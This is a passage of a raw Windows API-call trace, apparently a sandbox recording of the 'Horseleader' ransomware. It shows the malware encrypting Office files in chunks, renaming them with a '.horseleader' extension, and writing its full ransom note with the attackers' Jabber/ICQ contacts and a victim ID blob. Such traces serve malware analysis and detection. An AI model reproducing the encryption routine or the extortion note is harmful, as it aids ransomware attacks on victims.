pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\OARPMANR.DLL.horseleader") returned 89 [0237.073] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\OARPMANR.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\oarpmanr.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\OARPMANR.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\oarpmanr.dll.horseleader")) returned 1 [0237.074] GetProcessHeap () returned 0x780000 [0237.074] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dd078 | out: hHeap=0x780000) returned 1 [0237.074] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4d183e00, ftCreationTime.dwHighDateTime=0x1ca520c, ftLastAccessTime.dwLowDateTime=0xef0320d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x4d183e00, ftLastWriteTime.dwHighDateTime=0x1ca520c, nFileSizeHigh=0x0, nFileSizeLow=0x795, dwReserved0=0x53f0eb47, dwReserved1=0x52427c41, cFileName="README.HTM", cAlternateFileName="")) returned 1 [0237.074] lstrcmpiW (lpString1="README.HTM", lpString2="Windows") returned -1 [0237.074] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\README.HTM") returned 75 [0237.074] StrStrIW (lpFirst="README.HTM", lpSrch=".horseleader") returned 0x0 [0237.074] lstrcmpW (lpString1="README.HTM", lpString2="#Decrypt#.txt") returned 1 [0237.074] lstrcmpW (lpString1="README.HTM", lpString2="_uninstalling_.png") returned 1 [0237.075] lstrlenW (lpString=".testttjffg") returned 11 [0237.075] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\README.HTM", lpSrch=".testttjffg") returned 0x0 [0237.075] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0237.075] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0237.075] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\README.HTM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\readme.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0237.076] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\README.HTM") returned 75 [0237.076] StrStrW (lpFirst="README.HTM", lpSrch=".txt") returned 0x0 [0237.076] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=1941) returned 1 [0237.077] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x795, lpOverlapped=0x0) returned 1 [0237.079] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffff86b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0237.079] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x795, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x795, lpOverlapped=0x0) returned 1 [0237.079] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.079] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0237.079] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0237.079] CloseHandle (hObject=0x1a4) returned 1 [0237.079] GetProcessHeap () returned 0x780000 [0237.080] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dd078 [0237.080] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\README.HTM.horseleader") returned 87 [0237.080] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\README.HTM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\readme.htm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\README.HTM.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\readme.htm.horseleader")) returned 1 [0237.081] GetProcessHeap () returned 0x780000 [0237.081] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dd078 | out: hHeap=0x780000) returned 1 [0237.081] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb401ca00, ftCreationTime.dwHighDateTime=0x1cbdec9, ftLastAccessTime.dwLowDateTime=0xc24d0020, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xb401ca00, ftLastWriteTime.dwHighDateTime=0x1cbdec9, nFileSizeHigh=0x0, nFileSizeLow=0x19b80, dwReserved0=0x53f0eb47, dwReserved1=0x52427c41, cFileName="xlsrvintl.dll", cAlternateFileName="XLSRVI~1.DLL")) returned 1 [0237.081] lstrcmpiW (lpString1="xlsrvintl.dll", lpString2="Windows") returned 1 [0237.081] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\xlsrvintl.dll") returned 78 [0237.081] StrStrIW (lpFirst="xlsrvintl.dll", lpSrch=".horseleader") returned 0x0 [0237.081] lstrcmpW (lpString1="xlsrvintl.dll", lpString2="#Decrypt#.txt") returned 1 [0237.081] lstrcmpW (lpString1="xlsrvintl.dll", lpString2="_uninstalling_.png") returned 1 [0237.081] lstrlenW (lpString=".testttjffg") returned 11 [0237.082] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\xlsrvintl.dll", lpSrch=".testttjffg") returned 0x0 [0237.082] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0237.082] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0237.082] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\xlsrvintl.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\xlsrvintl.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0237.091] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\xlsrvintl.dll") returned 78 [0237.091] StrStrW (lpFirst="xlsrvintl.dll", lpSrch=".txt") returned 0x0 [0237.091] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=105344) returned 1 [0237.091] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.092] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0237.094] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0237.094] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0237.095] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xa5c0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.095] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0237.106] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0237.106] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0237.107] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x14b80, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.107] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0237.107] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0237.107] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0237.108] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.108] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0237.108] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0237.108] CloseHandle (hObject=0x1a4) returned 1 [0237.109] GetProcessHeap () returned 0x780000 [0237.109] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dd078 [0237.109] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\xlsrvintl.dll.horseleader") returned 90 [0237.109] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\xlsrvintl.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\xlsrvintl.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\xlsrvintl.dll.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\xlsrvintl.dll.horseleader")) returned 1 [0237.110] GetProcessHeap () returned 0x780000 [0237.110] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dd078 | out: hHeap=0x780000) returned 1 [0237.110] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb401ca00, ftCreationTime.dwHighDateTime=0x1cbdec9, ftLastAccessTime.dwLowDateTime=0xc24d0020, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xb401ca00, ftLastWriteTime.dwHighDateTime=0x1cbdec9, nFileSizeHigh=0x0, nFileSizeLow=0x19b80, dwReserved0=0x53f0eb47, dwReserved1=0x52427c41, cFileName="xlsrvintl.dll", cAlternateFileName="XLSRVI~1.DLL")) returned 0 [0237.111] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0237.111] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\#Decrypt#.txt") returned 78 [0237.111] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0237.112] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0237.112] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0237.113] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0237.113] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0237.113] CloseHandle (hObject=0x158) returned 1 [0237.114] GetProcessHeap () returned 0x780000 [0237.114] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0237.114] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x703dbc00, ftCreationTime.dwHighDateTime=0x1cbdfc0, ftLastAccessTime.dwLowDateTime=0xd80a4ee0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x703dbc00, ftLastWriteTime.dwHighDateTime=0x1cbdfc0, nFileSizeHigh=0x0, nFileSizeLow=0x310788, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="ACECORE.DLL", cAlternateFileName="")) returned 1 [0237.114] lstrcmpiW (lpString1="ACECORE.DLL", lpString2="Windows") returned -1 [0237.114] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACECORE.DLL") returned 71 [0237.114] StrStrIW (lpFirst="ACECORE.DLL", lpSrch=".horseleader") returned 0x0 [0237.114] lstrcmpW (lpString1="ACECORE.DLL", lpString2="#Decrypt#.txt") returned 1 [0237.114] lstrcmpW (lpString1="ACECORE.DLL", lpString2="_uninstalling_.png") returned 1 [0237.114] lstrlenW (lpString=".testttjffg") returned 11 [0237.114] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACECORE.DLL", lpSrch=".testttjffg") returned 0x0 [0237.114] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0237.114] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0237.114] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACECORE.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acecore.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0237.116] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACECORE.DLL") returned 71 [0237.116] StrStrW (lpFirst="ACECORE.DLL", lpSrch=".txt") returned 0x0 [0237.116] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=3213192) returned 1 [0237.116] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.116] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0237.753] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0237.753] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0237.753] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x185bc4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.753] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0237.797] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0237.797] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0237.797] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x30b788, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.798] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0237.863] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0237.863] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0237.863] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.863] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0237.864] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0237.864] CloseHandle (hObject=0x158) returned 1 [0237.864] GetProcessHeap () returned 0x780000 [0237.864] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0237.864] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACECORE.DLL.horseleader") returned 83 [0237.864] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACECORE.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acecore.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACECORE.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acecore.dll.horseleader")) returned 1 [0237.866] GetProcessHeap () returned 0x780000 [0237.866] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0237.866] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3706ca00, ftCreationTime.dwHighDateTime=0x1cba5d5, ftLastAccessTime.dwLowDateTime=0xd80f11a0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x3706ca00, ftLastWriteTime.dwHighDateTime=0x1cba5d5, nFileSizeHigh=0x0, nFileSizeLow=0xb5db8, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="ACEDAO.DLL", cAlternateFileName="")) returned 1 [0237.866] lstrcmpiW (lpString1="ACEDAO.DLL", lpString2="Windows") returned -1 [0237.866] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEDAO.DLL") returned 70 [0237.866] StrStrIW (lpFirst="ACEDAO.DLL", lpSrch=".horseleader") returned 0x0 [0237.866] lstrcmpW (lpString1="ACEDAO.DLL", lpString2="#Decrypt#.txt") returned 1 [0237.866] lstrcmpW (lpString1="ACEDAO.DLL", lpString2="_uninstalling_.png") returned 1 [0237.866] lstrlenW (lpString=".testttjffg") returned 11 [0237.866] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEDAO.DLL", lpSrch=".testttjffg") returned 0x0 [0237.867] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0237.867] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0237.867] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEDAO.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acedao.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0237.868] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft 